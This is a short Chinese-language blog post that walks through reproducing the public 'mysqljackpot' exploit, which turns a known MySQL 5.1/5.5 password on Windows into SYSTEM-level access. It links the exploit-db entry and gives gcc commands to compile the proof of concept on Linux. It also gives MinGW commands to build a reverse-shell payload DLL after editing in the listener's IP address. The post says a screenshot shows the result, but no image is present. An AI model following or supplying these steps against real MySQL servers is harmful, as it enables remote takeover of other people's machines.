MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot) 验证–windows下mysql提权

2月2日mysql爆出windows下5.1/5.5mysql账号可以提权至系统权限

http://www.exploit-db.com/exploits/23073/

下面将我的测试步骤记录下来:

1、首先找到一台linux机器,我在上面已经安装了mysql,安装目录在/usr/local/mysql

2、下载poc程序,解压缩,然后编译mysqljackpot.c

gcc -o mysqljackpot mysqljackpot.c -I /usr/local/mysql/include -L /usr/local/mysql/lib/mysql/ -lmysqlclient

3、由于需要反向shell,需要借助payload.dll,这个文件需要在windows下编译,首先得安装MinGW,在MinGW下进行编译(需要修改payload.c中的ip为我们的反向shell所在的机器ip)

set PATH=%PATH%;c:MinGWbin
gcc -c payload.c
gcc -shared -o payload.dll payload.o -lws2_32

4、在linux机器上执行程序,效果如下:

由上图可见,在已知mysql密码的情况下即可获取对方机器的系统权限!